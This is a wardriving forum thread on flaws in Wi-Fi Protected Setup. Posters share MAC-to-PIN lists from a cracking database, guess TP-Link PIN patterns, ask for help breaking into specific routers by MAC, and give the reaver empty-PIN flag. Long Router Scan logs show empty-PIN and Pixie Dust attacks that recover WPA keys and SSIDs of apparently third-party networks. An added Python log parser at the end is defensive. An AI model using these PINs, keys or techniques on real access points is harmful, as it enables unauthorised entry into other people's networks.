Vulnerability in the Wi-Fi Protected Setup protocol

Discussion in "Wireless Technologies/Wi-Fi/Wardriving", started by gpuhash, 30.12.2011.

  1. binarymaster

    We're not psychics here. What is the signal's RSSI level? Which application are you using to connect?
     
  2. ms13

    Oh, forget him...
    He's trying to connect from some Android gadget and says he gets an error that the signal is weak, but in fact the signal is fine.
     
  3. binarymaster

    Ah, well, that explains everything. Nothing new, though.
     
    fffsfs likes this.
  4. Ana1rebus

    Help me out, guys, keenetic 28:28:5d:ed:dd:ce
     
  5. Stas956457

  6. TOX1C

    Found another interesting chunk of TP-Links in the database. If the last character matches and the second-to-last one in the MAC differs, then the first digit of the PIN will either match or be ±1.
    It's not a coincidence, this isn't the first such block I've found in the database.

    F8:1A:67:C3:37_6A 65399644
    F8:1A:67:C3:37_DA 61564862
    F8:1A:67:C3:37_FA 51835606

    F8:1A:67:C3:37_BC 77362926
    F8:1A:67:C3:37_3C 66252450

    for these the beginning doesn't match, but the pattern does

    F8:1A:67:C3:37:E2 49292534
    F8:1A:67:C3:37:72 07570698

    maybe I'll find something else interesting.
     
  7. TOX1C

    And for dessert, a pretty MAC and a pretty PIN for it

    90:f6:52:aa:ec:af 91916167 wa701nd
    in the database everything in this range comes from wifi map, which is a pity, there are 2 interesting access points there.
    looking for something similar in the database
    64:66:b3:36:3f:ca 81817177 wr740n
    and right away
    64:66:B3:36:36:F2 28583653
    64:66:B3:36:33:F6 37573027
    64:66:B3:36:3B:54 47461512 (!!)
    64:66:B3:36:38:EA 72747018
    5 access points with the same mask


    the last digit matched, and the beginning matched.
    64:66:B3:36:39:22 03793930
    64:66:B3:36:39:52 07217470
    64:66:B3:36:30:92 09469594

    64:66:B3:36:39:54 21705052
    64:66:B3:36:3B:44 21895944
    64:66:B3:36:39:14 25091137

    64:66:B3:36:3B:54 47461512
    64:66:B3:36:3A:64 49212716
    64:66:B3:36:39:44 50371976
    here something else shows up: the lower the third character from the end, the larger the PIN itself (B = 47; A = 49; 9 = 50). the same turns up in other blocks too, but not always.

    more

    64:66:B3:2D:C9:14 68683030 wa830re
    and in the database
    64:66:B3:2D:C2:FA 63621914 (?? why does the 4th digit again differ by -1, as in the previous example??)
    64:66:B3:2D:C9:E5 05054442

    to dig further, I need a dump of all the TP-Links from the database in mac-pin format, and even more I need help from someone with brains.
     
  8. carartem02

    On a D-Link DIR-815 (looked it up in 3wifi) I can't get the password (while having a valid PIN)
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Quitting after 1 crack attempts
    [-] Failed to recover WPA key
    [*] String pin was specified, nothing to save.
    What could the problem be?
     
  9. antis17

    What prevents you from connecting with the PIN and then looking at the password?
     
  10. binarymaster

    What prevents it is that "connecting with the PIN" is nothing other than obtaining the password with the PIN and then connecting with that password, which is exactly what the person above is trying to do.
    Many similar devices on NRU firmware don't give up the password even with the correct PIN. But sometimes on them the password is the same as that PIN.
     
    carartem02 likes this.
  11. fffsfs

    I meant, how is it actually used!
     
  12. fffsfs

    Probably the password:
    Nadezhda
     
  13. fffsfs

    f8:1a:67:54:6e:dede
    Why are there no PINs in 3wifi, it seems to be WPA
     
  14. binarymaster

    Because it's a TP-LINK TL-WR941N.
     
    fffsfs and carartem02 like this.
  15. TOX1C

    And a few more coincidences
    E8:94:F6:2E:CB:10 64484570
    E8:94:F6:2E:CB:80 65445181
    here the ending didn't match, but the PIN is close to the previous ones.
    E8:94:F6:2E:CB:F4 69438813
     
  16. binarymaster

    News from the world of PIN codes.

    D-Link DIR-620 routers from Rostelecom (BSSID E4:6F:13:*) are vulnerable to an empty PIN code. :)

    Verified in practice:
    https://forum.antichat.ru/posts/4122981
     
  17. binarymaster

    And ZTE ZXHN H118N routers too! :cool:

    Code:
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 6DDA2C0103BB28624169DCAC0B4D3D20
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: ZTE Corporation
    [*] Model Name: ZXHN H118N
    [*] Model Number: ZXHN H118N
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Modem/Router
    [*] Sending WPS Message M2...
    [*] R-Nonce: 733D35864C79F206ABBED593FEB8A6EA
    [*] PKR: CE733463B55D3C410E59949D94F0B95FFF816DC2CBD27F0832F010121143F37FEBE96A22E7B43C1A4CCE45BBCDFE48A55BCACE804C0643286208DE9F620C9F8DF6B91D1F1AD7EB9398B49E28CCFA1349DFCB11943A6D6F40FC52C76BEDB2FECC516906A4C4FFF0C10AE337EF9F82E9AA4B695B3707256B4E13CEEA0E19B29E2B35BDFA8E09BD60F2B3FF78E9B3BD2A0A7D97B633A0046134BFC03C18AADA6A002C60709A56191DB258025C9249BB0668BFE45078F4AAA32E937FB88A802850BC
    [*] AuthKey: 06C01B8D83A4B25EA741980E912F59F3687D22D277526F7F12774BDECDBB16E0
    [*] Received WPS Message M3.
    [*] E-Hash1: 2FA02BFDBE2FC4010C6C655870CC8FABB651F930401C61BB23C28A04597F163F
    [*] E-Hash2: 2FA02BFDBE2FC4010C6C655870CC8FABB651F930401C61BB23C28A04597F163F
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Session timed out.
    [+] WPS PIN: <empty>
    [+] SSID: RT-WiFi_46FC
    [+] Key: 9035000440
    [+] Key Index: 01
    [*] Audit stopped.
     
  18. binarymaster

    And also the D-Link DIR-825AC, and note how much persistence it took, but it was obtained!

    Code:
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "06540883"...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin "06540883"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: A4D079E8DC0FFF2BED9BFBB6F769E775
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: D-Link Systems
    [*] Model Name: DIR-825AC
    [*] Model Number: DIR-825AC
    [*] Serial Number: 123456789012347
    [*] Device Name: DIR-825AC
    [*] Sending WPS Message M2...
    [*] R-Nonce: 956581FBC3D8332D6CF673EC84B7FD1B
    [*] PKR: F5F72C0DD8C32129A0D59E340636D4F3D59DAF36EFD39C73EF021CB2501BAA13D56C67994EEB4A266DA44EB0D9E1FA34A5422CA5B359686A8F80336705E5E5F772BEBE9C421CEF21EFAC70D778580E66CD5753EF5A62DA91CFD68469FB87469860BA76BD18B2EB2B0454554154EE4700D68D0143CAAC08E51B02E7EC3A6A2B96D8F77A541CD5CBDDB1CD8F750A823F8B83E6CFFA142BB3798980D59C03E355B931D2A311DE78C4D2494CE87E9D42C85ACB39F747454946C313F68F9EDE425372
    [*] AuthKey: 9F5DB6F5AC0CE6C1C71259C251DB57AE6321302AABEE76277BB0D67D3DB7AAA7
    [*] Received WPS Message M1.
    [*] E-Nonce: A4D079E8DC0FFF2BED9BFBB6F769E775
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: 956581FBC3D8332D6CF673EC84B7FD1B
    [*] PKR: F5F72C0DD8C32129A0D59E340636D4F3D59DAF36EFD39C73EF021CB2501BAA13D56C67994EEB4A266DA44EB0D9E1FA34A5422CA5B359686A8F80336705E5E5F772BEBE9C421CEF21EFAC70D778580E66CD5753EF5A62DA91CFD68469FB87469860BA76BD18B2EB2B0454554154EE4700D68D0143CAAC08E51B02E7EC3A6A2B96D8F77A541CD5CBDDB1CD8F750A823F8B83E6CFFA142BB3798980D59C03E355B931D2A311DE78C4D2494CE87E9D42C85ACB39F747454946C313F68F9EDE425372
    [*] AuthKey: 9F5DB6F5AC0CE6C1C71259C251DB57AE6321302AABEE76277BB0D67D3DB7AAA7
    [*] Received WPS Message M3.
    [*] E-Hash1: D88F7A4B3387DBC49FB4B5338708046A23106EFFFC75456CC64AB1A22A236D4C
    [*] E-Hash2: 4B7E9E88690957B81698F2C14111757F0467AF1B9531DF88380530B17A5B6752
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Starting Pixie Dust attack...
    [-] Pixie Dust PIN not found.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [+] Associated successfully.
    [-] Request timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin ""...
    [+] Associated successfully.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin ""...
    [+] Associated successfully.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [+] Associated successfully.
    [-] Request timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [+] Associated successfully.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [+] Associated successfully.
    [-] Request timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Request timed out.
    [*] Sending Identity Response...
    [-] Session timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [+] Associated successfully.
    [-] Request timed out.
    [*] Reconnecting...
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [-] Request timed out.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] Sending WPS Message M2...
    [*] Received WPS Message M1.
    [*] Sending WPS Message M2...
    [-] Request timed out.
    [*] Sending WPS Message M2...
    [*] Received WPS Message M3.
    [*] Sending WPS Message M4...
    [*] Received WPS Message M3.
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [-] Request timed out.
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: Liliya
    [+] Key: 8 <phone number hidden>
    [+] Key Index: 01
    [*] Audit stopped.
    
     
  19. Vovan19

    What does the reaver command look like in Kali 2 for cracking without a WPS PIN?
     
  20. binarymaster

    With the -p "" flag (it was mentioned a few pages back).

    And I also unexpectedly found a Sercomm RV6688BCM, which usually fall to Pixie Dust... but this time I came across one with an empty PIN! o_O

    Code:
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin "12345670"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 136F70913C5A8B74225978490E93239C
    [*] PKE: 0FB2D266E52270D3864CA09700FD11124283FCF835118C455512192D398729C2C7B9AAA3E49A87ADEDA99DB0872E6295CBC188AA18E7E54B83D75FB2632EF786D76E8296B13E9AAFD55ECBD521B08E394DD01B623B4A49F2F3D112EA0CE1611974C527B0EF25DC739D2500AEEAEA2E65DCA7E264D5CD231E20B4B495C003E8FBC3C440B2BB2BFDE8BBF34EE2970F60FDF425D4198C35417111A01DBDF04E2A465F1C80AB502B64D52A7714327B93F39DBC0173BE280B78EB593FA5F130B1CC8E
    [*] Manufacturer: SERCOMM
    [*] Model Name: RV6688BCM
    [*] Model Number: RV6688BCM
    [*] Serial Number: 53434F4D14104997
    [*] Device Name: RV6688BCM
    [*] Sending WPS Message M2...
    [*] R-Nonce: 4B82C0F1E6431FBD116BB37870AE2B4E
    [*] PKR: 971CB3AC567472A7C62FBAD38998FE84F769E4F18602D9BBFE0667C0FD4EDD88AECCF65C24CD0E1A8F5DF0B33068CD2D5258A12E92909F9008B45858BE716C924AC2ABF6C29BA8DEA801BD77BD8DA8A5EB9C7392B508C28C36CFDB43CC1469DFDFE3BB7DB29D5F5F8DA257FF6B802B66068D8242F9A3125AC64796141D0BC7EE3D9BCBF2FD3A7D1B19A53183B41E6654A6A1BA946D4D71E55D25A1E2925606FAE6BA5FA2828FD3B98BF39801F1E1844742F93C5068B9E9A40CF2444BB07E6DD4
    [*] AuthKey: CA808543C03093432C15F8AAF2C7D7414A63065E9D9C0E0216DBE88E008E54EF
    [*] Received WPS Message M3.
    [*] E-Hash1: E56F292D3C9BE82A8702EB2A1435F9CC404ABE8D7E7737D72946FB09D4FBAD75
    [*] E-Hash2: E56F292D3C9BE82A8702EB2A1435F9CC404ABE8D7E7737D72946FB09D4FBAD75
    [*] This AP is potentially vulnerable to the "empty string" pin.
    [*] To specify <empty> pin, add empty line to PINs list and disable checksum calculation.
    [*] Also in this case the pin can have two same halfs (e.g. 00000000).
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Request timed out.
    [*] Sending WSC NACK...
    [-] Session timed out.
    [*] Starting Pixie Dust attack...
    [*] The AP /might be/ vulnerable.
    [*] Try again with --force or with another (newer) set of data.
    [*] Also ensure that the date time and time zone on your computer are set correctly.
    [*] Audit stopped.
    [*] Audit started.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 53DDC768720082F141C35BF4051E4F48
    [*] PKE: 2DC9A4EE82191F650548A09FE72993E75FC33944454D54D36C1A94C413F9AE3698245EB9C0BD5758E97CD15DD7264B19E22E088D567077D8883835B1F206A29E26C123949F8E8F1ED719FF49C92B1A778EDB3AB32174862451C5A8A978552D907FFFF2E759B120B1067664101C482A7321C5EA020F8DBDAAB06AC4FA55EA96F5EFE3C919FD7198EE5AD9512C97B91930A36E0FEECF5390DB8ABFA62FE922D312887F0CACF2EFEB6B2B20F0E2D3E9CDE34F79B87F352932D8D69389B248475803
    [*] Manufacturer: SERCOMM
    [*] Model Name: RV6688BCM
    [*] Model Number: RV6688BCM
    [*] Serial Number: 53434F4D14104997
    [*] Device Name: RV6688BCM
    [*] Sending WPS Message M2...
    [*] R-Nonce: 0A5920DB91A74631739A26BE87711D96
    [*] PKR: 6A23E76D3D13B67BA56AEC2277580CE736567A0AD400EE03DED57CFD0454D6A1436F6309A2E33FF9404D376F10B65E5D01CC30E9DE9CB4DD1A625A11A59A2D7179D46DF1749A659799B5C23263D87225F9363C53F64C84750B34175AFC7AB2DBD3EB6092EE5C703F3245B5E2C2A071EF6D5439A5D8AB53D5F34608E2984FCA19829D9D1FBF2FA185A60F3173BF9111777054B7C9E616AB2061DE255F92550100A6B7F65F7623878384F0B2FDE8AE37D5D82D0FD59A3C3A1186CD2CA5DFE6DB03
    [*] AuthKey: 23DB14DBE508E911E4B185298C17B168EBB3AA7A6FB7369FCB7D2A9DE589CADC
    [*] Received WPS Message M3.
    [*] E-Hash1: 8799E7C5674192252389D749E42801B8C1BD47BE6904CE96274223FE05EE22A3
    [*] E-Hash2: 8799E7C5674192252389D749E42801B8C1BD47BE6904CE96274223FE05EE22A3
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: MGTS_GPON_4997
    [+] Key: XSA6P4XF
    [+] Key Index: 1
    [*] Audit stopped.
    

    RS does warn about a potential empty PIN, yes. :)
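
Added example (not part of the thread and not Router Scan's own code): a parser for audit logs in the format quoted above, for reviewing test results from access points you administer. It flags audits in which E-Hash1 equals E-Hash2 in M3, the condition behind the tool's "empty string" notice, and audits that ended with the empty PIN accepted; the sample log is constructed with placeholder values, and all function and finding names are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the log format quoted in the thread (placeholder values).
SAMPLE_LOG = """\
[*] Audit started.
[*] Trying pin "12345670"...
[*] Model Name: EXAMPLE-AP
[*] E-Hash1: AAAA0000
[*] E-Hash2: AAAA0000
[-] Error: Wrong PIN code.
[*] Audit stopped.
[*] Audit started.
[*] Trying pin ""...
[-] Request timed out.
[*] Trying pin ""...
[*] Model Name: EXAMPLE-AP
[*] E-Hash1: BBBB1111
[*] E-Hash2: BBBB1111
[+] WPS PIN: <empty>
[*] Audit stopped.
[*] Audit started.
[*] Trying pin "06540883"...
[*] Model Name: OTHER-AP
[*] E-Hash1: CCCC2222
[*] E-Hash2: DDDD3333
[-] Error: Wrong PIN code.
[*] Audit stopped.
"""

LINE = re.compile(r"^\s*\[[*+-]\]\s+(.*)$")          # "[*] message"
TRY_PIN = re.compile(r'^Trying pin "(.*)"\.\.\.$')   # PIN attempt line
FIELD = re.compile(r"^([A-Za-z0-9 -]+?):\s*(.*)$")   # "Key: value"

@dataclass
class Audit:
    model: str = ""
    pins_tried: List[str] = field(default_factory=list)
    e_hash1: str = ""
    e_hash2: str = ""
    recovered_pin: Optional[str] = None  # "" means the empty PIN was accepted

def parse_audits(text: str) -> List[Audit]:
    audits: List[Audit] = []
    cur: Optional[Audit] = None
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        msg = m.group(1).strip()
        if msg == "Audit started.":
            cur = Audit()
            audits.append(cur)
        elif cur is None:
            continue  # line outside any audit
        elif (t := TRY_PIN.match(msg)):
            if t.group(1) not in cur.pins_tried:  # retries repeat the line
                cur.pins_tried.append(t.group(1))
        elif (f := FIELD.match(msg)):
            key, val = f.group(1), f.group(2).strip()
            if key == "Model Name":
                cur.model = val
            elif key in ("E-Hash1", "E-Hash2"):
                setattr(cur, key.lower().replace("-", "_"), val.upper())
            elif key == "WPS PIN":
                cur.recovered_pin = "" if val == "<empty>" else val
    return audits

def findings(a: Audit) -> List[str]:
    out = []
    # E-Hash1/E-Hash2 are keyed hashes over (secret nonce, PIN half, PKE, PKR);
    # equal values mean both nonces and both PIN halves are identical.
    if a.e_hash1 and a.e_hash1 == a.e_hash2:
        out.append("equal-e-hash")
    if a.recovered_pin == "":
        out.append("empty-pin-accepted")
    return out

def report(text: str):
    return [(a.model, a.pins_tried, findings(a)) for a in parse_audits(text)]
```

A device that produces either finding should have WPS PIN enrollment disabled or its firmware replaced.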
     